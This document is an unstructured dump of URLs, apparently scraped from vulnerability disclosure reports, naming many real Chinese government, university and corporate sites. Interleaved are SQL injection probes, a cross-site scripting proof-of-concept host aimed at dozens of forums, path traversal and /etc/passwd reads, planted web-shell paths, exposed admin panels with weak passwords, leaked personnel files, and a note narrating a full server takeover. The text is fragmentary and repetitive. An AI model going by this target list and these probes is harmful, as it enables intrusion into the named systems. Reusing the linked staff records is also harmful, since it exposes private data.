http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://xw.yaya888.com/app/priceline/data.php?gid=5876&code=1426571413 http://club.lenovo.com.cn/ http://club.lenovo.com.cn/lefen/gift/pub/shdz.php http://mhz.pw/game/discuz/xss.php?domain=bbs.u.360.cn http://syxx.yiban.cn:80/admin/.svn/entries http://swsxx.yiban.cn:80/admin/.svn/entries http://spa.yiban.cn:80/bbs_foot_link/.svn/entries http://spa.yiban.cn:80/blog/.svn/entries http://spa.yiban.cn:80/eclass/.svn/entries http://spa.yiban.cn:80/function/.svn/entries http://spa.yiban.cn:80/weibo/.svn/entries http://spa.yiban.cn:80/admin/.svn/entries http://shyyxx.yiban.cn:80/admin/.svn/entries http://shsmly.yiban.cn:80/admin/.svn/entries http://shkg.yiban.cn:80/bbs_foot_link/.svn/entries http://shkg.yiban.cn:80/blog/.svn/entries http://im.gjzq.cn:9090/login.jsp http://glj.zmdjtj.gov.cn/news.asp?id=953 http://www.japan.ntu.edu.tw/subject/news_sql.php?id=14加上AND1=1,AND www.daling.com http://www.daling.com:80/ www.daling.com http://114.112.82.54/bak/gotologin.box http://61.168.11.39/wwwroot.rar http://campus.chinahr.com/ http://campus.chinahr.com/2015/pages/ikongjian/jobs.asp?did=303311000002 http://59.51.130.42/testDown1.php?Name=../testDown1.php http://error.zhanchengkeji.com/uc_server http://city2012.house.sina.com.cn/api/luck_draw.php?type=prizelist&ty=1 http://city2012.house.sina.com.cn/api/luck_draw.php?type=prizelist&ty=1%20%20AND%203*2*1=6%20AND%201=2&action=1&callback=jQuery16107100072728935629_1426584902676&_=1426584905502 http://chengde.mop.com,登录后访问以下POC,等待2秒触发: 
http://mhz.pw/game/discuz/xss.php?domain=chengde.mop.com http://mhz.pw/game/discuz/xss.php?domain=fuzhou.mop.com http://mhz.pw/game/discuz/xss.php?domain=xiamen.mop.com http://mhz.pw/game/discuz/xss.php?domain=zhuhai.mop.com http://mhz.pw/game/discuz/xss.php?domain=wuhan.mop.com http://mhz.pw/game/discuz/xss.php?domain=yuncheng.mop.com http://mhz.pw/game/discuz/xss.php?domain=shiyan.mop.com inurl:site_item_list_4.php www.ymca-tainan.org.tw/nursery/site_item_content_4.php?site_map_item_id=754 www.taccn.org.tw/site_item_list_4.php?site_map_item_id=4 www.rha.org.tw/site_item_list_4.php?site_map_item_id=23 www.ncku-tn.tw/site_item_content_4.php?site_map_item_id=42 www.etan.com.tw/huide_hosp/big5/site_item_content_4.php?site_map_item_id=347 http://www.piaoyou.org/case_web.htm http://nj.bicpa.org.cn/excel/excel!doOfficialExportExcel.action http://lab.njnu.edu.cn/fjlist.asp?id=87 http://down.chinaz.com/soft/35447.htm http://www.edayshop.com/ inurl:sp.asp?sx= http://freetuan.net//admins/upfile_flash.asp http://www.epqy.cn/dgt//admins/upfile_flash.asp http://www.baidurx.com/shspoh/admins/upfile_flash.asp http://www.pncsdq.com/admins/upfile_flash.asp http://o.smpx.com/admins/upfile_flash.asp http://www.shfdj.com//admins/upfile_flash.asp http://mall.hnllg.com///admins/upfile_flash.asp http://www.qzdxc.com//admins/upfile_flash.asp http://www.10-10-10.cn/fx/admins/upfile_flash.asp http://www.hanibabyppo.com/tuangou/admins/upfile_flash.asp http://www.jmqxl.com/admins/upfile_flash.asp http://mhz.pw/game/discuz/xss.php?domain=bbs.mhzx2.wanmei.com http://mhz.pw/game/discuz/xss.php?domain=xxxx http://bbs.nw.wanmei.com http://bbs.mhsd.wanmei.com http://bbs.chibi.wanmei.com http://bbs.rwpd.wanmei.com http://bbs.kdxy.wanmei.com http://bbs.d.wanmei.com http://bbs.sg.wanmei.com http://bbs.seiya.wanmei.com http://bbs.mhzx2.wanmei.com http://bbs.sgcq.wanmei.com http://bbs.sgsj.wanmei.com http://bbs.sw.wanmei.com http://bbs.ts.wanmei.com http://bbs.radio.wanmei.com 
http://bbs.sdxl.wanmei.com http://bbs.xljz.wanmei.com http://bbs.sd.wanmei.com http://bbs.xlzj.wanmei.com http://bbs.shenmo.wanmei.com http://bbs.xmhzx.wanmei.com http://bbs.w2i.wanmei.com http://bbs.world2.wanmei.com http://bbs.xa.wanmei.com http://bbs.zhuxian.wanmei.com http://bbs.zhuxian2.wanmei.com http://bbs.xiaoao.wanmei.com http://bbs.wulin2.wanmei.com https://www.cmpassport.com/ http://gd.kandian.189.cn/ http://gd.kandian.189.cn/invoker/JMXInvokerServlet http://admin.tsz.gfan.com/login.php?act=logging http://www.worldeyes.net/ http://www.worldeyes.net/ http://www.tebon.com.cn/dbzq/zcgl/data/jhjzData.jsp?code=CE0002 http://cmse.sdkd.net.cn/admin/Login.asp http://cmse.sdkd.net.cn/newsinfo.asp?id=2149 http://ucenter.ehaoyao.com/familyMember/index.html) http://218.28.234.99/ViewsTrain.asp?ID=1246 http://cszm.hnfyxh.cn/ua http://mhz.pw/game/discuz/xss.php?domain=bbs.xiaomi.cn st2:http://huiyi.ecloud.10086.cn:80/MSBD/checkcode/getCheckCode http://huiyi.ecloud.10086.cn:80/manager/html http://bbs.ffo.changyou.com http://bbs.eos.changyou.com http://bbs.swd.changyou.com http://bbs.tl.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.ffo.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.eos.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.swd.changyou.com http://mhz.pw/game/discuz/xss.php?domain=bbs.tl.changyou.com http://cbh.zshr.cn/ http://cbh.zshr.cn/person/searchjobs.php?id=10 http://down.chinaz.com/soft/35103.htm http://www.shop7z.com/demo/showone.asp?l_id=44 http://**.**.**/service/wapindex.php http://地址/cgi-bin/web_cgi?op_req=apply&module=conf_bakdown http://地址/cgi-bin/web_cgi?op_req=apply&module=syslog_management&opt=down&type=system http://gd.servyou.com.cn/yingp.asp?info_kind=009002&ID=38 http://gd.servyou.com.cn:800/GDServyou/HKLY/new.aspx http://210.73.128.41/jsbz/ www.moliwanhui.com后台弱口令admin,admin直接登录后台,OTCMS 
www.wooyun.org/bugs/wooyun-2014-057589提供方法拿下服务器shell权限,遍历服务器文件,下载mysql数据user.MYD文件,成功破解root密码,利用mysql提权(园长博客有介绍),拿下服务器权限,获取kangle配置文件config.xml,解密md5值,登录kangle,103台虚拟机到手。 http://guoji.zhuna.cn/theme-friend http://guoji.zhuna.cn/special_theme/theme_word_positive_add/ http://www.gdsto.com.cn/ http://www.gdsto.com.cn/admin/ewebeditor/uploadfile/aa.asp http://www.gdsto.com.cn/admin/ewebeditor/uploadfile/111.asp http://www.gdsto.com.cn/admin/ewebeditor/uploadfile/cmd.txt http://www.gdsto.com.cn/admin/fuck.asp http://www.gdsto.com.cn/admin/1.asp http://www.gdsto.com.cn/test.html http://**.**.**/tpolice/login!loginView_ http://www.chemdoc.com.cn/login.aspx?ACT=1 http://kaiyuan.hudong.com/sq/site_authorize.php?siteurl= http://www.haojiankang.com/jmx-console/,该服务器Jboss配置不当,没设密码,导致直接可getshell http://down.chinaz.com/soft/35447.htm http://www.edayshop.com/ inurl:sp.asp?sx= http://freetuan.net/zxzx.asp http://www.shfdj.com/zxzx.asp http://www.tuan150.com/zxzx.asp http://www.jmqxl.com/zxzx.asp http://www.pncsdq.com/zxzx.asp http://o.smpx.com/zxzx.asp http://mall.hnllg.com/zxzx.asp http://cszm.hnfyxh.cn/ua soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:web="http://webservice.blf.jcms soapenv:Header/ soapenv:Body web:wsGetAllInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:int xsi:type="xsd:int xsi:type="xsd:int xsi:type="xsd:int xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string web:wsGetAllInfos soapenv:Body soapenv:Envelope www.gs.gov.cn http://xxgk.zjds.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.taixing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jining.gov.cn/xxgk/services/WSReceive?wsdl http://www.xxgk.lg.gov.cn/xxgk/services/WSReceive?wsdl http://www.jinhua.gov.cn/xxgk/services/WSReceive?wsdl http://gongkai.sd-n-tax.gov.cn/xxgk/services/WSReceive?wsdl 
http://xxgk.wenzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsgs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.nbjiangbei.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sdxm.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changde.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gygov.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.longwan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cqyc.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gaomi.gov.cn:82/xxgk/services/WSReceive?wsdl http://www.huzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zaozhuang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lucheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.weihai.gov.cn/xxgk/services/WSReceive?wsdl http://218.94.123.47/xxgk/services/WSReceive?wsdl http://xxgk.yiyuan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zhucheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.nanxun.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.xiaogan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zibo.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lyg.gov.cn/xxgk/services/WSReceive?wsdl http://211.138.126.163/xxgk/services/WSReceive?wsdl http://xxgk.wencheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.liaocheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsforestry.gov.cn/xxgk/services/WSReceive?wsdl http://60.190.68.201:7001/xxgk/services/WSReceive?wsdl http://xxgk.shizhong.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzlps.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingning.gov.cn/xxgk/services/WSReceive?wsdl http://blxxgk.bl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.qingzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.panxian.gov.cn/xxgk/services/WSReceive?wsdl http://www.dongtai.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.shanghe.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cncn.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzwd.gov.cn/xxgk/services/WSReceive?wsdl http://www.hzgjj.gov.cn/xxgk/services/WSReceive?wsdl 
http://xxgk.siyang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjwy.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tianqiao.gov.cn/xxgk/services/WSReceive?wsdl http://218.2.208.145/xxgk/services/WSReceive?wsdl http://xxgk.jc.gansu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wzrc.net/xxgk/services/WSReceive?wsdl http://xxgk.hbjs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jiangyan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingjiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changle.gov.cn:82/xxgk/services/WSReceive?wsdl http://xxgk.szzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.stats-sd.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.hg.gov.cn/xxgk/services/WSReceive?wsdl http://www.zjdlr.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yqjq.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.heze.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk3.nantong.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsgl.cn/xxgk/services/WSReceive?wsdl http://www.zjch.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yidu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsmuseum.com/xxgk/services/WSReceive?wsdl http://www.77778.com/xxgk/services/WSReceive?wsdl http://xxgk.pingyin.gov.cn/xxgk/services/WSReceive?wsdl http://www.jshb.net/xxgk/services/WSReceive?wsdl http://zfxxgk.seac.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tx.gov.cn/xxgk/services/WSReceive?wsdl http://www.dejiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yq.gov.cn/xxgk/services/WSReceive?wsdl http://www.ec.js.edu.cn/xxgk/services/WSReceive?wsdl http://www.njzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjpy.gov.cn/xxgk/services/WSReceive?wsdl http://www.gaoqing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.czzl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.liuzhi.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sx.gov.cn/xxgk_public/services/WSReceive?wsdl http://xxgk.10.gov.cn/gov/services/WSReceive?wsdl 
http://xxgk.ycxl.gov.cn/gov/services/WSReceive?wsdl http://xxgk.changyang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.haiyan.gov.cn/gov/services/WSReceive?wsdl http://open.jiashan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yichang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.dyq.gov.cn/gov/services/WSReceive?wsdl http://xxgk.xingshan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.kuiwen.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbwf.gov.cn/gov/services/WSReceive?wsdl http://www.wuxing.gov.cn/gov/services/WSReceive?wsdl http://61.159.149.203:9080/gov/services/WSReceive?wsdl http://xxgk.dianjun.gov.cn/gov/services/WSReceive?wsdl http://211.138.126.163:7003/gov/services/WSReceive?wsdl http://xxgk.zrt.gov.cn/gov/services/WSReceive?wsdl http://220.191.221.136/gov/services/WSReceive?wsdl http://119.191.58.141/gov/services/WSReceive?wsdl http://zfxxgk.dongying.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbdy.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yuanan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.lijin.gov.cn/gov/services/WSReceive?wsdl http://xxgk.sdfda.gov.cn/gov/services/WSReceive?wsdl http://data.earthquake.cn/datashare/datashare_details.jsp?id=XJ.201503152341.0002.C.001 http://mis.xinhuanet.com/sxtv2/index/inc/info/info.asp?tid={9E563755-C612-4ECF-A390-B9574DBFB604 http://bbs.auto.sina.com.cn/forum-717-1.html,随意找个贴子,回复 http://www.lzseyy.com/HNews_Show.asp?classid=37&Articleid=2954 http://www.scgbmotorway.com/manager http://58.17.139.94/xb.txt http://www.333jcw.com/gcdc_title.php?id=7657 http://www.wxcs.cn http://bbs.wenjuan.com/t-5287-1-1.html http://cms.h3c.com/h3ccms/resources/file:/etc/passwd http://218.28.29.35:9001/default.asp http://ehr.cofco.com/file/doc/download/邹为_干部履历表.xls http://ehr.cofco.com/file/doc/download/林焕生_干部履历表.xls http://ehr.cofco.com/file/doc/download/王偲_干部履历表.xls http://www.piaoyou.org/case_web.htm http://www.cqship.com/busAreasshow.aspx?BaseInfoId=67 http://www.cqship.com/fleetshow.aspx?BaseInfoId=48 
http://www.cqship.com/partysshow.aspx?NewsId=516 http://self.kdah.cn/ http://www1.ahedu.gov.cn/schinfo/login.aspx http://221.193.242.165 http://mnote.weibo.10086.cn/login.html?version=3.8.0 http://218.25.254.41:8090/ http://221.226.253.14:84/Home/List.aspx?newclass=0&type=1 http://www.tumen.gov.cn/news.asp?id=1272&bigclassname=%D5%FE%B8%AE%BD%A8%C9%E8&smallclassname= http://t.cn/RAvtUDF http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.zuiyouxi.com/cservice/ http://218.94.38.180:8092/posg/userLogin.action http://124.202.133.29/admincp/admin/login http://apixy.zuiyouxi.com:8800/admincp/admin/loginUser/ http://tianeky.com.cn/siteinfoQuery.action http://ecop.hq.10086.cn/login.go http://ecop.hq.10086.cn/login.go http://210.32.158.99/zjuiptp/res/Expert_view.action http://111.13.96.23:7778/ http://www.9555168.com/list.php?cat=24 http://dx.9555168.com/page.php?id=16 http://dx.9555168.com/list.php?cat=23 http://client.beijing.gov.cn http://www.asggzyjy.cn/search.jspx?q=1 http://www.asggzyjy.cn/page/index.jspx?code=CMS_GUID_JSGC http://www.asggzyjy.cn/news/cqjy/one/index.jspx?id=1 http://www.asggzyjy.cn/news/jsgc/one/index.jspx?id=1 http://www.asggzyjy.cn/news/news/one/index.jspx?id=7116 http://www.asggzyjy.cn/news/notice/one/index.jspx?id=3980 http://www.asggzyjy.cn/news/notice/page/index.jspx?code=1 http://www.asggzyjy.cn/news/type/one/index.jspx?base=&counter=98060&id=1 http://www.asggzyjy.cn/news/zfcg/one/index.jspx?id=1 http://www.asggzyjy.cn/news/news/all/index.jspx?code=CMS_INTEGRITY_ZWDT 
http://www.asggzyjy.cn/username_unique.jspx?username=1 http://www.asggzyjy.cn/enterprisecode_unique.jspx?enterpriseCode=1 http://www.asggzyjy.cn/enterprisename_unique.jspx?enterpriseName=1 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetColumn soapenv:Body soapenv:Envelope www.gs.gov.cn http://xxgk.zjds.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.taixing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jining.gov.cn/xxgk/services/WSReceive?wsdl http://www.xxgk.lg.gov.cn/xxgk/services/WSReceive?wsdl http://www.jinhua.gov.cn/xxgk/services/WSReceive?wsdl http://gongkai.sd-n-tax.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wenzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsgs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.nbjiangbei.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sdxm.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changde.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gygov.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.longwan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cqyc.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gaomi.gov.cn:82/xxgk/services/WSReceive?wsdl http://www.huzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zaozhuang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lucheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.weihai.gov.cn/xxgk/services/WSReceive?wsdl http://218.94.123.47/xxgk/services/WSReceive?wsdl http://xxgk.yiyuan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zhucheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.nanxun.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.xiaogan.gov.cn/xxgk/services/WSReceive?wsdl 
http://xxgk.zibo.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.lyg.gov.cn/xxgk/services/WSReceive?wsdl http://211.138.126.163/xxgk/services/WSReceive?wsdl http://xxgk.wencheng.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.liaocheng.gov.cn/xxgk/services/WSReceive?wsdl http://www.jsforestry.gov.cn/xxgk/services/WSReceive?wsdl http://60.190.68.201:7001/xxgk/services/WSReceive?wsdl http://xxgk.shizhong.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzlps.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingning.gov.cn/xxgk/services/WSReceive?wsdl http://blxxgk.bl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.qingzhou.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.panxian.gov.cn/xxgk/services/WSReceive?wsdl http://www.dongtai.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.shanghe.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.cncn.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.gzwd.gov.cn/xxgk/services/WSReceive?wsdl http://www.hzgjj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.siyang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjwy.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tianqiao.gov.cn/xxgk/services/WSReceive?wsdl http://218.2.208.145/xxgk/services/WSReceive?wsdl http://xxgk.jc.gansu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.wzrc.net/xxgk/services/WSReceive?wsdl http://xxgk.hbjs.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jiangyan.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jingjiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.changle.gov.cn:82/xxgk/services/WSReceive?wsdl http://xxgk.szzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.stats-sd.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.hg.gov.cn/xxgk/services/WSReceive?wsdl http://www.zjdlr.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yqjq.gov.cn/xxgk/services/WSReceive?wsdl http://zfxxgk.heze.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk3.nantong.gov.cn/xxgk/services/WSReceive?wsdl 
http://www.jsgl.cn/xxgk/services/WSReceive?wsdl http://www.zjch.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yidu.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.jsmuseum.com/xxgk/services/WSReceive?wsdl http://www.77778.com/xxgk/services/WSReceive?wsdl http://xxgk.pingyin.gov.cn/xxgk/services/WSReceive?wsdl http://www.jshb.net/xxgk/services/WSReceive?wsdl http://zfxxgk.seac.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.tx.gov.cn/xxgk/services/WSReceive?wsdl http://www.dejiang.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.yq.gov.cn/xxgk/services/WSReceive?wsdl http://www.ec.js.edu.cn/xxgk/services/WSReceive?wsdl http://www.njzj.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.zjpy.gov.cn/xxgk/services/WSReceive?wsdl http://www.gaoqing.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.czzl.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.liuzhi.gov.cn/xxgk/services/WSReceive?wsdl http://xxgk.sx.gov.cn/xxgk_public/services/WSReceive?wsdl http://xxgk.10.gov.cn/gov/services/WSReceive?wsdl http://xxgk.ycxl.gov.cn/gov/services/WSReceive?wsdl http://xxgk.changyang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.haiyan.gov.cn/gov/services/WSReceive?wsdl http://open.jiashan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.yichang.gov.cn/gov/services/WSReceive?wsdl http://xxgk.dyq.gov.cn/gov/services/WSReceive?wsdl http://xxgk.xingshan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.kuiwen.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbwf.gov.cn/gov/services/WSReceive?wsdl http://www.wuxing.gov.cn/gov/services/WSReceive?wsdl http://61.159.149.203:9080/gov/services/WSReceive?wsdl http://xxgk.dianjun.gov.cn/gov/services/WSReceive?wsdl http://211.138.126.163:7003/gov/services/WSReceive?wsdl http://xxgk.zrt.gov.cn/gov/services/WSReceive?wsdl http://220.191.221.136/gov/services/WSReceive?wsdl http://119.191.58.141/gov/services/WSReceive?wsdl http://zfxxgk.dongying.gov.cn/gov/services/WSReceive?wsdl http://xxgk.hbdy.gov.cn/gov/services/WSReceive?wsdl 
http://xxgk.yuanan.gov.cn/gov/services/WSReceive?wsdl http://xxgk.lijin.gov.cn/gov/services/WSReceive?wsdl http://xxgk.sdfda.gov.cn/gov/services/WSReceive?wsdl http://123.127.211.26/ http://123.127.211.26/ams/view.php?id=10 http://123.127.211.26/ams/view.php?id=10 url:http://www.citcc-1.com.cn/index.asp http://www.citcc-1.com.cn/shownews.asp http://www.citcc-1.com.cn/shownews.asp http://www.citcc-1.com.cn/shownews.asp www.diyigaokao.com http://220.191.180.238/phpmyadmin/index.php存在弱口令 http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://cwc.sxufe.edu.cn/KfWeb/admin/GenerateRegUser.aspx http://www.shcdkf.com/kfweb/admin/GenerateRegUser.aspx http://cwch.ahu.edu.cn/querynetweb/admin/GenerateRegUser.aspx http://221.5.51.228/cjb/admin/GenerateRegUser.aspx http://59.72.128.44/KfWeb/admin/GenerateRegUser.aspx http://www.cqvie.com/xfcxbn/admin/GenerateRegUser.aspx http://cycwc.gzife.edu.cn/kefa/admin/GenerateRegUser.aspx http://210.45.92.21/admin/GenerateRegUser.aspx http://cwcx.jlsu.edu.cn/admin/GenerateRegUser.aspx http://cw.syu.edu.cn:8080/kfweb/admin/GenerateRegUser.aspx http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://cwc.sxufe.edu.cn/KfWeb/admin/mdf_userXssf.aspx http://www.shcdkf.com/kfweb/admin/mdf_userXssf.aspx http://gzcx.tynu.edu.cn/kfweb/admin/mdf_userXssf.aspx http://cwch.ahu.edu.cn/querynetweb/admin/mdf_userXssf.aspx http://221.5.51.228/cjb/admin/mdf_userXssf.aspx http://59.72.128.44/KfWeb/admin/mdf_userXssf.aspx http://www.cqvie.com/xfcxbn/admin/mdf_userXssf.aspx http://cycwc.gzife.edu.cn/kefa/admin/mdf_userXssf.aspx http://210.45.92.21/admin/mdf_userXssf.aspx http://cwcx.jlsu.edu.cn/admin/mdf_userXssf.aspx http://cw.syu.edu.cn:8080/kfweb/admin/mdf_userXssf.aspx http://www.shcdkf.com/kfweb/admin/GenerateRegUser.aspx http://cwcx.jlsu.edu.cn/admin/mdf_userXssf.aspx http://www.lzsmzj.gov.cn/news-info.asp?id=479&cataid=11 http://www.rsws.gov.cn/ http://118.194.34.207/ 
http://118.194.34.207/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector&type=../ http://118.194.34.207/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector&type=../../ http://118.194.34.207/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector&type=../../../ http://118.194.34.207/pos/posbusiness/train_get_code_tree.jsp?codesetid=1* http://118.194.34.207/pos/posbusiness/train http://118.194.34.207/system/report_orgtree.jsp?unitcode=3&report_type=1* http://118.194.34.207/system/report_orgtree.jsp?unitcode=3&report_type=1* http://jxk.sdkd.net.cn/show.asp?nrID=384 http://jxk.sdkd.net.cn/admin/login.asp http://211.154.151.24/yyoa/index.jsp http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://gprs.tofly.cn/ http://x.co/****** http://www.suyufc.gov.cn/ http://www.suyufc.gov.cn//fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.suyufc.gov.cn//fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=http://www.suyufc.gov.cn//fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.suyufc.gov.cn/UserFiles/file/1.asp/201503192104104563424.jpg http://shop.96877.net/product.do主页。注册个用户。 http://218.78.241.80/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://www.xwgjzx.com:8888/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://www.gxbyzx.cn:88/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 
